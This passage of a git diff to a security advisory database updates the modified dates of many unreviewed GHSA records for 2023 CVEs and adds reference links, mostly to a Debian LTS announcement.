"GHSA-gcqr-v3j7-qf2p", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35970" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35970" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1789" diff --git a/advisories/unreviewed/2024/01/GHSA-gqwq-w99c-9rc2/GHSA-gqwq-w99c-9rc2.json b/advisories/unreviewed/2024/01/GHSA-gqwq-w99c-9rc2/GHSA-gqwq-w99c-9rc2.json index d1763cfd5e3..d31fca5a854 100644 --- a/advisories/unreviewed/2024/01/GHSA-gqwq-w99c-9rc2/GHSA-gqwq-w99c-9rc2.json +++ b/advisories/unreviewed/2024/01/GHSA-gqwq-w99c-9rc2/GHSA-gqwq-w99c-9rc2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gqwq-w99c-9rc2", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37442" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37442" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1805" diff --git a/advisories/unreviewed/2024/01/GHSA-gv7v-cr3p-w5q7/GHSA-gv7v-cr3p-w5q7.json b/advisories/unreviewed/2024/01/GHSA-gv7v-cr3p-w5q7/GHSA-gv7v-cr3p-w5q7.json index c855504e93c..cb9e412a5d1 100644 --- a/advisories/unreviewed/2024/01/GHSA-gv7v-cr3p-w5q7/GHSA-gv7v-cr3p-w5q7.json +++ b/advisories/unreviewed/2024/01/GHSA-gv7v-cr3p-w5q7/GHSA-gv7v-cr3p-w5q7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gv7v-cr3p-w5q7", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37447" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37447" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1805" diff --git a/advisories/unreviewed/2024/01/GHSA-gx5r-5h4q-3h4f/GHSA-gx5r-5h4q-3h4f.json b/advisories/unreviewed/2024/01/GHSA-gx5r-5h4q-3h4f/GHSA-gx5r-5h4q-3h4f.json index f9f3087c0ed..bdc979da830 100644 --- a/advisories/unreviewed/2024/01/GHSA-gx5r-5h4q-3h4f/GHSA-gx5r-5h4q-3h4f.json +++ b/advisories/unreviewed/2024/01/GHSA-gx5r-5h4q-3h4f/GHSA-gx5r-5h4q-3h4f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gx5r-5h4q-3h4f", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38623" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38623" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1812" diff --git a/advisories/unreviewed/2024/01/GHSA-h2f9-xfxp-2rvx/GHSA-h2f9-xfxp-2rvx.json b/advisories/unreviewed/2024/01/GHSA-h2f9-xfxp-2rvx/GHSA-h2f9-xfxp-2rvx.json index cb4c16a48cb..ce0d9e4508b 100644 --- a/advisories/unreviewed/2024/01/GHSA-h2f9-xfxp-2rvx/GHSA-h2f9-xfxp-2rvx.json +++ b/advisories/unreviewed/2024/01/GHSA-h2f9-xfxp-2rvx/GHSA-h2f9-xfxp-2rvx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h2f9-xfxp-2rvx", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35702" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35702" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1783" diff --git a/advisories/unreviewed/2024/01/GHSA-h2jx-f8c9-6v68/GHSA-h2jx-f8c9-6v68.json b/advisories/unreviewed/2024/01/GHSA-h2jx-f8c9-6v68/GHSA-h2jx-f8c9-6v68.json index 9e749a727cb..e606eb90372 100644 --- a/advisories/unreviewed/2024/01/GHSA-h2jx-f8c9-6v68/GHSA-h2jx-f8c9-6v68.json +++ b/advisories/unreviewed/2024/01/GHSA-h2jx-f8c9-6v68/GHSA-h2jx-f8c9-6v68.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h2jx-f8c9-6v68", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37575" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37575" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1806" diff --git a/advisories/unreviewed/2024/01/GHSA-hj28-g29j-qvp6/GHSA-hj28-g29j-qvp6.json b/advisories/unreviewed/2024/01/GHSA-hj28-g29j-qvp6/GHSA-hj28-g29j-qvp6.json index e36f43501b8..efc8bde5794 100644 --- a/advisories/unreviewed/2024/01/GHSA-hj28-g29j-qvp6/GHSA-hj28-g29j-qvp6.json +++ b/advisories/unreviewed/2024/01/GHSA-hj28-g29j-qvp6/GHSA-hj28-g29j-qvp6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hj28-g29j-qvp6", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37922" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37922" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1807" diff --git a/advisories/unreviewed/2024/01/GHSA-hp86-fc6r-wg46/GHSA-hp86-fc6r-wg46.json b/advisories/unreviewed/2024/01/GHSA-hp86-fc6r-wg46/GHSA-hp86-fc6r-wg46.json index 7fb7c0bcf4c..f069bf71194 100644 --- a/advisories/unreviewed/2024/01/GHSA-hp86-fc6r-wg46/GHSA-hp86-fc6r-wg46.json +++ b/advisories/unreviewed/2024/01/GHSA-hp86-fc6r-wg46/GHSA-hp86-fc6r-wg46.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hp86-fc6r-wg46", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35969" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35969" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1789" diff --git a/advisories/unreviewed/2024/01/GHSA-hrc8-fc9f-gh45/GHSA-hrc8-fc9f-gh45.json b/advisories/unreviewed/2024/01/GHSA-hrc8-fc9f-gh45/GHSA-hrc8-fc9f-gh45.json index 3a40e544970..a5282961d83 100644 --- a/advisories/unreviewed/2024/01/GHSA-hrc8-fc9f-gh45/GHSA-hrc8-fc9f-gh45.json +++ b/advisories/unreviewed/2024/01/GHSA-hrc8-fc9f-gh45/GHSA-hrc8-fc9f-gh45.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hrc8-fc9f-gh45", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37282" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37282" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1810" diff --git a/advisories/unreviewed/2024/01/GHSA-j44v-ghf8-cf8j/GHSA-j44v-ghf8-cf8j.json b/advisories/unreviewed/2024/01/GHSA-j44v-ghf8-cf8j/GHSA-j44v-ghf8-cf8j.json index cade1eff94d..6814f465a76 100644 --- a/advisories/unreviewed/2024/01/GHSA-j44v-ghf8-cf8j/GHSA-j44v-ghf8-cf8j.json +++ b/advisories/unreviewed/2024/01/GHSA-j44v-ghf8-cf8j/GHSA-j44v-ghf8-cf8j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j44v-ghf8-cf8j", - "modified": "2024-01-08T15:30:30Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:30Z", "aliases": [ "CVE-2023-39444" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39444" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1826" diff --git a/advisories/unreviewed/2024/01/GHSA-j68r-vcw2-6wm6/GHSA-j68r-vcw2-6wm6.json b/advisories/unreviewed/2024/01/GHSA-j68r-vcw2-6wm6/GHSA-j68r-vcw2-6wm6.json index f9d52887fb5..fb240269d58 100644 --- a/advisories/unreviewed/2024/01/GHSA-j68r-vcw2-6wm6/GHSA-j68r-vcw2-6wm6.json +++ b/advisories/unreviewed/2024/01/GHSA-j68r-vcw2-6wm6/GHSA-j68r-vcw2-6wm6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j68r-vcw2-6wm6", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37420" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37420" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1804" diff --git a/advisories/unreviewed/2024/01/GHSA-jh6m-g253-f37c/GHSA-jh6m-g253-f37c.json b/advisories/unreviewed/2024/01/GHSA-jh6m-g253-f37c/GHSA-jh6m-g253-f37c.json index 1892dc0caa8..03957f5478f 100644 --- a/advisories/unreviewed/2024/01/GHSA-jh6m-g253-f37c/GHSA-jh6m-g253-f37c.json +++ b/advisories/unreviewed/2024/01/GHSA-jh6m-g253-f37c/GHSA-jh6m-g253-f37c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jh6m-g253-f37c", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38622" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38622" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1812" diff --git a/advisories/unreviewed/2024/01/GHSA-m93g-v4mv-3ggr/GHSA-m93g-v4mv-3ggr.json b/advisories/unreviewed/2024/01/GHSA-m93g-v4mv-3ggr/GHSA-m93g-v4mv-3ggr.json index 916bb1ed543..cca19b505eb 100644 --- a/advisories/unreviewed/2024/01/GHSA-m93g-v4mv-3ggr/GHSA-m93g-v4mv-3ggr.json +++ b/advisories/unreviewed/2024/01/GHSA-m93g-v4mv-3ggr/GHSA-m93g-v4mv-3ggr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m93g-v4mv-3ggr", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38619" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38619" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1812" diff --git a/advisories/unreviewed/2024/01/GHSA-mcwj-fc2v-3xc2/GHSA-mcwj-fc2v-3xc2.json b/advisories/unreviewed/2024/01/GHSA-mcwj-fc2v-3xc2/GHSA-mcwj-fc2v-3xc2.json index 847793fc27c..cdb9112d18b 100644 --- a/advisories/unreviewed/2024/01/GHSA-mcwj-fc2v-3xc2/GHSA-mcwj-fc2v-3xc2.json +++ b/advisories/unreviewed/2024/01/GHSA-mcwj-fc2v-3xc2/GHSA-mcwj-fc2v-3xc2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mcwj-fc2v-3xc2", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35992" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35992" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1790" diff --git a/advisories/unreviewed/2024/01/GHSA-mf7c-gj3r-c59v/GHSA-mf7c-gj3r-c59v.json b/advisories/unreviewed/2024/01/GHSA-mf7c-gj3r-c59v/GHSA-mf7c-gj3r-c59v.json index 888456ea6e5..7813138f149 100644 --- a/advisories/unreviewed/2024/01/GHSA-mf7c-gj3r-c59v/GHSA-mf7c-gj3r-c59v.json +++ b/advisories/unreviewed/2024/01/GHSA-mf7c-gj3r-c59v/GHSA-mf7c-gj3r-c59v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mf7c-gj3r-c59v", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35958" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35958" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1785" diff --git a/advisories/unreviewed/2024/01/GHSA-mhrq-7p7f-w264/GHSA-mhrq-7p7f-w264.json b/advisories/unreviewed/2024/01/GHSA-mhrq-7p7f-w264/GHSA-mhrq-7p7f-w264.json index 505bb7a0a9c..c8ab38695d9 100644 --- a/advisories/unreviewed/2024/01/GHSA-mhrq-7p7f-w264/GHSA-mhrq-7p7f-w264.json +++ b/advisories/unreviewed/2024/01/GHSA-mhrq-7p7f-w264/GHSA-mhrq-7p7f-w264.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mhrq-7p7f-w264", - "modified": "2024-01-08T15:30:30Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:30Z", "aliases": [ "CVE-2023-39317" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39317" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1820" diff --git a/advisories/unreviewed/2024/01/GHSA-mpwp-23xv-7j3h/GHSA-mpwp-23xv-7j3h.json b/advisories/unreviewed/2024/01/GHSA-mpwp-23xv-7j3h/GHSA-mpwp-23xv-7j3h.json index 252f69b8634..54aec2e72aa 100644 --- a/advisories/unreviewed/2024/01/GHSA-mpwp-23xv-7j3h/GHSA-mpwp-23xv-7j3h.json +++ b/advisories/unreviewed/2024/01/GHSA-mpwp-23xv-7j3h/GHSA-mpwp-23xv-7j3h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mpwp-23xv-7j3h", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37443" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37443" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1805" diff --git a/advisories/unreviewed/2024/01/GHSA-mxjm-rf6p-f3mh/GHSA-mxjm-rf6p-f3mh.json b/advisories/unreviewed/2024/01/GHSA-mxjm-rf6p-f3mh/GHSA-mxjm-rf6p-f3mh.json index 86ff80ddf8f..bf6fde9e01f 100644 --- a/advisories/unreviewed/2024/01/GHSA-mxjm-rf6p-f3mh/GHSA-mxjm-rf6p-f3mh.json +++ b/advisories/unreviewed/2024/01/GHSA-mxjm-rf6p-f3mh/GHSA-mxjm-rf6p-f3mh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mxjm-rf6p-f3mh", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:52Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35704" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35704" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1783" diff --git a/advisories/unreviewed/2024/01/GHSA-p58m-jmcr-h3gh/GHSA-p58m-jmcr-h3gh.json b/advisories/unreviewed/2024/01/GHSA-p58m-jmcr-h3gh/GHSA-p58m-jmcr-h3gh.json index 8aee1ac201d..a4fcf1ac311 100644 --- a/advisories/unreviewed/2024/01/GHSA-p58m-jmcr-h3gh/GHSA-p58m-jmcr-h3gh.json +++ b/advisories/unreviewed/2024/01/GHSA-p58m-jmcr-h3gh/GHSA-p58m-jmcr-h3gh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p58m-jmcr-h3gh", - "modified": "2024-01-08T15:30:27Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:27Z", "aliases": [ "CVE-2023-35959" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35959" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1786" diff --git a/advisories/unreviewed/2024/01/GHSA-pjpq-gg4j-5jg3/GHSA-pjpq-gg4j-5jg3.json b/advisories/unreviewed/2024/01/GHSA-pjpq-gg4j-5jg3/GHSA-pjpq-gg4j-5jg3.json index d068dca51cb..827f3dfcd89 100644 --- a/advisories/unreviewed/2024/01/GHSA-pjpq-gg4j-5jg3/GHSA-pjpq-gg4j-5jg3.json +++ b/advisories/unreviewed/2024/01/GHSA-pjpq-gg4j-5jg3/GHSA-pjpq-gg4j-5jg3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pjpq-gg4j-5jg3", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38653" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38653" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1815" diff --git a/advisories/unreviewed/2024/01/GHSA-pxvc-5jrx-h52p/GHSA-pxvc-5jrx-h52p.json b/advisories/unreviewed/2024/01/GHSA-pxvc-5jrx-h52p/GHSA-pxvc-5jrx-h52p.json index e6ac35b73ca..30b7cf46a35 100644 --- a/advisories/unreviewed/2024/01/GHSA-pxvc-5jrx-h52p/GHSA-pxvc-5jrx-h52p.json +++ b/advisories/unreviewed/2024/01/GHSA-pxvc-5jrx-h52p/GHSA-pxvc-5jrx-h52p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pxvc-5jrx-h52p", - "modified": "2024-01-26T21:30:22Z", + "modified": "2024-04-09T09:31:10Z", "published": "2024-01-26T21:30:22Z", "aliases": [ "CVE-2024-0939" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://vuldb.com/?id.252184" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.269268" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-q4gv-76qv-qh34/GHSA-q4gv-76qv-qh34.json b/advisories/unreviewed/2024/01/GHSA-q4gv-76qv-qh34/GHSA-q4gv-76qv-qh34.json index 838eee15a1a..379535da681 100644 --- a/advisories/unreviewed/2024/01/GHSA-q4gv-76qv-qh34/GHSA-q4gv-76qv-qh34.json +++ b/advisories/unreviewed/2024/01/GHSA-q4gv-76qv-qh34/GHSA-q4gv-76qv-qh34.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q4gv-76qv-qh34", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-37574" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37574" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1806" diff --git a/advisories/unreviewed/2024/01/GHSA-q8wr-886h-q847/GHSA-q8wr-886h-q847.json b/advisories/unreviewed/2024/01/GHSA-q8wr-886h-q847/GHSA-q8wr-886h-q847.json index c91f19ac80b..fd0d761f009 100644 --- a/advisories/unreviewed/2024/01/GHSA-q8wr-886h-q847/GHSA-q8wr-886h-q847.json +++ b/advisories/unreviewed/2024/01/GHSA-q8wr-886h-q847/GHSA-q8wr-886h-q847.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q8wr-886h-q847", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38621" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38621" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1812" diff --git a/advisories/unreviewed/2024/01/GHSA-qf87-w7v3-9256/GHSA-qf87-w7v3-9256.json b/advisories/unreviewed/2024/01/GHSA-qf87-w7v3-9256/GHSA-qf87-w7v3-9256.json index c50585b6667..86f317a9697 100644 --- a/advisories/unreviewed/2024/01/GHSA-qf87-w7v3-9256/GHSA-qf87-w7v3-9256.json +++ b/advisories/unreviewed/2024/01/GHSA-qf87-w7v3-9256/GHSA-qf87-w7v3-9256.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qf87-w7v3-9256", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-35994" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35994" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1791" diff --git a/advisories/unreviewed/2024/01/GHSA-r287-6vw5-j92p/GHSA-r287-6vw5-j92p.json b/advisories/unreviewed/2024/01/GHSA-r287-6vw5-j92p/GHSA-r287-6vw5-j92p.json index 3628da8d8a0..57e9118b6e4 100644 --- a/advisories/unreviewed/2024/01/GHSA-r287-6vw5-j92p/GHSA-r287-6vw5-j92p.json +++ b/advisories/unreviewed/2024/01/GHSA-r287-6vw5-j92p/GHSA-r287-6vw5-j92p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r287-6vw5-j92p", - "modified": "2024-01-08T15:30:28Z", + "modified": "2024-04-09T21:31:53Z", "published": "2024-01-08T15:30:28Z", "aliases": [ "CVE-2023-37419" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37419" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1804" diff --git a/advisories/unreviewed/2024/01/GHSA-r9wf-mqxc-cfhw/GHSA-r9wf-mqxc-cfhw.json b/advisories/unreviewed/2024/01/GHSA-r9wf-mqxc-cfhw/GHSA-r9wf-mqxc-cfhw.json index fa04976b3f3..acfdfd51a38 100644 --- a/advisories/unreviewed/2024/01/GHSA-r9wf-mqxc-cfhw/GHSA-r9wf-mqxc-cfhw.json +++ b/advisories/unreviewed/2024/01/GHSA-r9wf-mqxc-cfhw/GHSA-r9wf-mqxc-cfhw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r9wf-mqxc-cfhw", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-39272" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39272" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1818" diff --git a/advisories/unreviewed/2024/01/GHSA-rjfr-rgjj-mvh5/GHSA-rjfr-rgjj-mvh5.json b/advisories/unreviewed/2024/01/GHSA-rjfr-rgjj-mvh5/GHSA-rjfr-rgjj-mvh5.json index 7a1bee5b6e7..60f73bc3eab 100644 --- a/advisories/unreviewed/2024/01/GHSA-rjfr-rgjj-mvh5/GHSA-rjfr-rgjj-mvh5.json +++ b/advisories/unreviewed/2024/01/GHSA-rjfr-rgjj-mvh5/GHSA-rjfr-rgjj-mvh5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rjfr-rgjj-mvh5", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:54Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38618" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38618" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1812" diff --git a/advisories/unreviewed/2024/01/GHSA-v3r4-2w85-9v4h/GHSA-v3r4-2w85-9v4h.json b/advisories/unreviewed/2024/01/GHSA-v3r4-2w85-9v4h/GHSA-v3r4-2w85-9v4h.json index 5bbc9c7f600..000f418dbbd 100644 --- a/advisories/unreviewed/2024/01/GHSA-v3r4-2w85-9v4h/GHSA-v3r4-2w85-9v4h.json +++ b/advisories/unreviewed/2024/01/GHSA-v3r4-2w85-9v4h/GHSA-v3r4-2w85-9v4h.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v3r4-2w85-9v4h", - "modified": "2024-01-08T15:30:29Z", + "modified": "2024-04-09T21:31:55Z", "published": "2024-01-08T15:30:29Z", "aliases": [ "CVE-2023-38652" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38652" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00007.html" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1815" diff --git a/advisories/unreviewed/2024/01/GHSA-v74j-582j-7x9r/GHSA-v74j-582j-7x9r.json b/advisories/unreviewed/2024/01/GHSA-v74j-582j-7x9r/GHSA-v74j-582j-7x9r.json index 48fc576f5da..da089a97795 100644 --- a/advisories/unreviewed/2024/01/GHSA-v74j-582j-7x9r/GHSA-v74j-582j-7x9r.json +++ 